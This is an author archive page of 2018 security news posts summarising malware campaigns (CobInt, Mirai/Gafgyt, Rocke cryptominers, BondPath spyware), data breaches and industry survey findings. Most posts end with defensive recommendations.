Author Archives: David Bisson

Cobalt Gang Using CobInt Downloader to Install Malware on Systems of Interest

The threat group known as Cobalt Gang is using a new downloader called CobInt to infect and subsequently install additional malware on systems of interest.

In August and September, Proofpoint observed four separate financially motivated attack campaigns from Cobalt Gang. Each of the operations used malicious URLs and Microsoft Word documents to download the first stage of CobInt malware.

For this phase, a basic downloader installed the main malware component. That element was responsible for executing various modules in the subsequent stage.

Researchers observed two modules at the time of discovery. One allowed the malware to send a screenshot to its command-and-control (C&C) server, and another enabled it to create and transfer a list of running processes on the infected machine. Even so, Proofpoint reasoned that CobInt likely loads up additional modules on systems of interest after it completes its reconnaissance stages.

What’s Driving the Rise of Malicious Downloaders?

According to Proofpoint, Cobalt Gang stopped using CobInt in May 2018 before picking it up again two months later. This return coincided with a rise in the use of downloaders to initially infect machines, conduct reconnaissance and install additional malware, as evidenced by Proofpoint’s discovery of two other downloaders, Marap and Advisorsbot, in August.

Aside from those findings, two additional malware families with downloader capabilities made second and third place in Check Point’s “Most Wanted Malware” list for August 2018. Check Point also tracked a growth of banking Trojan activity for August, with malicious downloaders helping to fuel this development.

How to Defend Against CobInt and Other Downloaders

Security professionals can defend their organizations against downloaders like CobInt by embracing artificial intelligence (AI) solutions to aid in threat detection and conduct cyber deception to misdirect and deactivate evasive malware. IBM experts also recommend monitoring and analyzing how apps behave across user devices and flagging anomalous behavior to nip future attacks in the bud.

Sources: Proofpoint, Proofpoint(1), Check Point

The post Cobalt Gang Using CobInt Downloader to Install Malware on Systems of Interest appeared first on Security Intelligence.

ICO to Fine Equifax £500,000 for 2017 Data Breach

The Information Commissioner’s Office (ICO) of the United Kingdom announced it will fine Equifax £500,000 for a data breach that occurred in 2017. In a monetary penalty notice filed on 19 September, the ICO revealed its decision to impose the maximum fine specified in section 55A of the Data Protection Act 1998 on Equifax. The […]… Read More

The post ICO to Fine Equifax £500,000 for 2017 Data Breach appeared first on The State of Security.

State Department Says Some Employee Info Possibly Exposed in Security Incident

The U.S. State Department said that some employees’ information might have been exposed in a recent security incident. In a notice shared by Politico, the State Department disclosed that “activity of concern” on an email system might have exposed some employees’ personally identifiable information (PII). IT personnel inside the Department determined that the activity affected […]… Read More

The post State Department Says Some Employee Info Possibly Exposed in Security Incident appeared first on The State of Security.

A Quarter of Civilian Federal Agencies Have Adopted DMARC and SPF for All Domains

A quarter of civilian federal agencies have adopted DMARC and SPF email authentication protocols for all their domains in compliance with a mandate. Thirty-four percent of 133 agencies are now fully compliant with what is known as BOD 18-01. Issued by the Department of Homeland Security (DHS), the mandate requires civilian federal agencies within its […]… Read More

The post A Quarter of Civilian Federal Agencies Have Adopted DMARC and SPF for All Domains appeared first on The State of Security.

Ransomware Attack Takes Down Airport’s Flight Information Screens

A ransomware attack prevented an English airport from using its flight information screens to assist passengers in their travels. On 13 September, Bristol Airport tweeted out that its flight information systems were experiencing technical difficulties. We are currently experiencing technical problems with our flight information screens. Flights are unaffected and details of check-in desks, boarding […]… Read More

The post Ransomware Attack Takes Down Airport’s Flight Information Screens appeared first on The State of Security.

Mirai and Gafgyt IoT Malware Now Targeting SonicWall’s GMS and Apache Struts Exploits

Security researchers discovered modified versions of the Mirai and Gafgyt Internet of Things (IoT) malware that are capable of targeting vulnerabilities affecting SonicWall’s Global Management System (GMS) and Apache Struts.

Earlier this month, Palo Alto Networks’ Unit 42 found a domain hosting a variant of the Mirai botnet containing exploits for 16 separate vulnerabilities. One of those flaws was an Apache Struts vulnerability associated with a major 2017 data breach — the first time security professionals observed Mirai targeting Apache Struts, a framework used for developing web applications.

The researchers’ analysis of Mirai led them to observe that the malicious domain previously resolved to a different IP address. Further investigation revealed that the IP address intermittently hosted a version of the Gafgyt botnet containing an exploit for CVE-2018-9866, a vulnerability affecting an older version of SonicWall’s GMS.

Mirai and Gafgyt Signal Shift Toward Enterprise-Level Attacks

Both Mirai and Gafgyt have been around for some time. Even so, Unit 42 detected three new attack campaigns from the two malware families in May 2018. The offensives also leveraged vulnerabilities affecting IoT devices, but those products were all consumer-oriented. The Unit 42 researchers posited that the addition of vulnerabilities targeting Apache Struts and SonicWall’s GMS could signal a shift toward attack campaigns targeting enterprise-level devices.

How to Defend Against IoT Malware

Security professionals can protect data privacy at the workplace by creating a dedicated incident response team to remediate vulnerabilities and disclose data breaches to the public. They should also consider investing in data protection solutions and conducting gap analyses to monitor the data generated by their employer’s IoT devices.

Finally, security personnel should aim to isolate IoT devices on their own network and establish access controls between these products and critical IT resources.

Sources: Palo Alto Networks, Palo Alto Networks(1)

The post Mirai and Gafgyt IoT Malware Now Targeting SonicWall’s GMS and Apache Struts Exploits appeared first on Security Intelligence.

ICO Receiving 500 Breach-Related Calls a Week Since GDPR Took Effect

The United Kingdom’s Information Commissioner’s Office (ICO) has been receiving 500 calls pertaining to data breaches since the European Union’s General Data Protection Regulation (GDPR) took effect. Speaking before hundreds of senior business leaders at the Confederation of British Industry’s (CBI’s) fourth annual Cyber Security Conference, ICO deputy commissioner James Dipple-Johnstone revealed that of the […]… Read More

The post ICO Receiving 500 Breach-Related Calls a Week Since GDPR Took Effect appeared first on The State of Security.

OilRig Launching Attack Campaigns With Updated BONDUPDATER Trojan

The OilRig group conducted at least one attack campaign containing an updated variant of the BONDUPDATER trojan as its final payload. In August 2018, Palo Alto Networks’ Unit 42 threat research team detected an OilRig campaign targeting a high-ranking government organization in the Middle East. The email campaign leveraged spear-phishing, one of the most common […]… Read More

The post OilRig Launching Attack Campaigns With Updated BONDUPDATER Trojan appeared first on The State of Security.

What is Vulnerability Management Anyway?

Vulnerability management (VM) programs are the meat and potatoes of every comprehensive information security program. They are not optional anymore. In fact, many information security compliance, audit and risk management frameworks require organizations to maintain a vulnerability management program. If you don’t have vulnerability management tools, or if your VM program is ad hoc, there’s […]… Read More

The post What is Vulnerability Management Anyway? appeared first on The State of Security.

Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners

A new threat actor is leveraging a varied tool kit and multiple payloads to distribute cryptomining malware, including Monero miners.

In April, Cisco Talos observed a new threat actor named Rocke using western and Chinese Git repositories to deliver cryptomining malware to honeypots that were vulnerable to an Apache Struts vulnerability.

Researchers detected Rocke conducting a similar campaign in July. In that operation, the threat actor communicated with an HTTP File Server (HFS) hosting 11 files. Two of those files — “TermsHost.exe” and “Config.json” — were the executables or configuration files for Monero miners. Many of the other hosted assets were shell scripts responsible for downloading and executing the miners or for killing processes that are commonly associated with other cryptomining malware or cryptomining in general.

Cryptomining Malware Continues to Grow

Rocke’s attack campaigns represent the latest offensives in an ongoing surge of cryptomining malware. In the first quarter of 2018, McAfee Labs detected a 629 percent increase in these threats, with the total number of detected samples rising from 400,000 to more than 2.9 million.

This growth coincides with a FireEye report that found a sharp increase in underground conversations containing cryptocurrency mining-related keywords beginning in 2017 and continuing through the first quarter of 2018.

These findings are also consistent with a sixfold increase in attacks involving embedded mining tools, which IBM Managed Security Services (MSS) observed between January and August 2017.

Defending Against Monero Miners

Security professionals can defend their organizations against threat actors that aim to spread Monero miners by scanning for the indicators of compromise (IoCs) identified in Cisco Talos’ report. Organizations should also consider implementing security best practices that offer blanket protection against malware and other digital threats. These controls should include the creation of a patch prioritization plan for security weaknesses affecting servers and other critical IT assets.

Sources: Cisco Talos, McAfee Labs, FireEye

The post Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners appeared first on Security Intelligence.

Beware the Homeless Homebuyer Real Estate Scam!

Security professionals are warning users who are or soon will be engaged in real estate transactions to watch out for the “homeless homebuyer” scam. On 10 September, Verdict built upon its coverage of account takeover attacks found in its threat insight magazine Verdict Encrypt to discuss this particular scam. The homeless homebuyer ruse first begins […]… Read More

The post Beware the Homeless Homebuyer Real Estate Scam! appeared first on The State of Security.

60 Percent of Targeted Email Attacks Aimed at Contributors and Lower Management

Well over half of targeted email attacks between April and June 2018 were aimed at individual contributors and low-level managers, according to a new report.

Proofpoint researchers discovered that individual contributors and low-level management together accounted for 60 percent of highly targeted attacks, which consisted primarily of malware and credential phishing. By comparison, upper management and executives received 23.5 percent and 5.2 percent of targeted attacks, respectively.

The enterprise security firm noted that those findings show how upper management and executives sustained “a disproportionately large share of attacks” given their smaller representation in the total workforce.

Email Attacks Are Surging Across Industries

These findings come amid an ongoing surge in malicious email messages: The researchers observed a 36 percent increase in email attacks between the first and second quarters of 2018. While companies of every size were targeted, some industries, such as retail, healthcare and government, experienced greater rates of growth for business email compromise (BEC) than other sectors.

The report revealed that most companies across all industries had been targeted by email fraudsters at least once. The number of attacks rose by 85 percent in the second quarter compared to the previous year. The growth rates were even larger for the automotive and education industries, at 400 percent and 250 percent, respectively.

How to Defend Against Targeted Attacks

Proofpoint advised security professionals to defend individual contributors, lower-level management and other staff members against targeted email attacks by partnering with a threat intelligence firm and leveraging a social media security solution to combat fake online accounts. Security teams should also consider creating a comprehensive security awareness program for the entire workforce.

Source: Proofpoint

The post 60 Percent of Targeted Email Attacks Aimed at Contributors and Lower Management appeared first on Security Intelligence.

Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program

Electric vehicle manufacturer Tesla is encouraging what it calls “good faith” security research in its bug bounty program. In its vulnerability disclosure program, Tesla says it welcomes “the community to participate in our responsible reporting process” for the company’s product offerings and services. Researchers who participate in the program must report a vulnerability along with […]… Read More

The post Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program appeared first on The State of Security.

Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys

Someone compromised a Google Chrome extension with malicious code designed to snoop on users’ account credentials and cryptocurrency private keys. On 4 September, a security researcher who goes by the name “SerHack” tweeted out a warning about version 3.39.4 of the Chrome extension for MEGA.nz, a cloud storage and file sharing service. !!! WARNING !!!!!!! […]… Read More

The post Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys appeared first on The State of Security.

More Than a Quarter of Executives View Security Investments as Having a Negative ROI

According to a new digital trust report, 27 percent of business executives view security investments as having a negative return on investment (ROI).

Of these respondents, more than three-quarters said they had been involved in a publicly disclosed data breach in the past, according to “The Global State of Online Digital Trust Survey and Index 2018” by CA Technologies.

This finding led the report’s authors to conclude that “over one quarter of executives are tone deaf to modern security challenges and data breach implications, and have not learned from previous mistakes.” By comparison, just 7 percent of cybersecurity staffers said they believe security investments produce a negative ROI.

The Trickiest Metric in Security

ROI is a tricky subject in the context of information security. According to CSO Online, digital security investments don’t produce greater profits, but instead contribute to “loss prevention,” or greater savings in the event of a security incident. This suggests that increased revenues shouldn’t factor into organizations’ decisions on whether to invest in digital security.

Another CSO Online piece proposed that ROI is the wrong metric for evaluating the efficacy of a digital security program. Instead, executives and board members should focus on network defender first principles. To get to the heart of these principles, executives need to determine how network defenders should spend their time and what they hope to achieve.

How to Quantify the ROI of Security Investments

To quantify the ROI of their organizations’ security investments, chief information security officers (CISOs) should consider adopting a zero-trust approach and focusing on people, programs and technology to improve their data security posture. They should also take the lead in improving formal risk management processes that evaluate information assets and vulnerabilities.

Sources: CA Technologies, CSO Online, CSO Online(1)

The post More Than a Quarter of Executives View Security Investments as Having a Negative ROI appeared first on Security Intelligence.

New BondPath Android Spyware Retrieves Chat Data From Messaging Apps

Researchers uncovered an Android spyware family called BondPath that is capable of retrieving chats from several mobile messaging apps while spying on other types of information.

BondPath has been around since May 2016, but in July 2018, researchers at Fortinet observed that some samples were still in the wild. Those specimens masqueraded as “Google Play Store Services,” an application signed by an unknown developer known only as “hola.” The name of this malicious application is intentionally similar to Google Play Services, the title of the process Google uses to update Android apps from the Play Store.

Upon successful execution, BondPath assumes the ability to steal an infected device’s browser history, call logs, emails and SMS messages. But a few less frequently used capabilities made BondPath stand out to the researchers, such as its ability to monitor an infected smartphone’s battery status. It could also steal chats from WhatsApp, Skype, Facebook, Line and other mobile messaging apps.

The Rise and Fall of Spyware

According to Verizon’s “2018 Data Breach Investigations Report,” spyware and keylogger malware were involved in 121 security incidents and 74 data breaches in 2017. This threat category increased its activity during the second half of 2017 and the beginning of 2018, yielding a 56 percent increase in detections during the first quarter of 2018, according to Malwarebytes. Spurred in part by a series of large attack campaigns pushing Emotet, Malwarebytes named spyware as the top detected business threat for the quarter.

Near the end of the first quarter, spyware activity declined significantly. It continued falling throughout the second quarter, ultimately decreasing by 40 percent, according to Malwarebytes. In that span of time, TrickBot was the most prevalent form of spyware after it added the ability to hijack cryptocurrency earlier in the year.

How to Protect Against Mobile Threats

To defend their organizations against BondPath and similar mobile threats that originate in official app stores, security teams should keep applications and operating systems running at the current patch level, verify the legitimacy of unsolicited email attachments through a separate channel, and monitor their IT environment for the indicators of compromise (IoCs) listed in the IBM X-Force Exchange threat advisory.

Sources: Fortinet, Verizon, Malwarebytes, Malwarebytes(1)

The post New BondPath Android Spyware Retrieves Chat Data From Messaging Apps appeared first on Security Intelligence.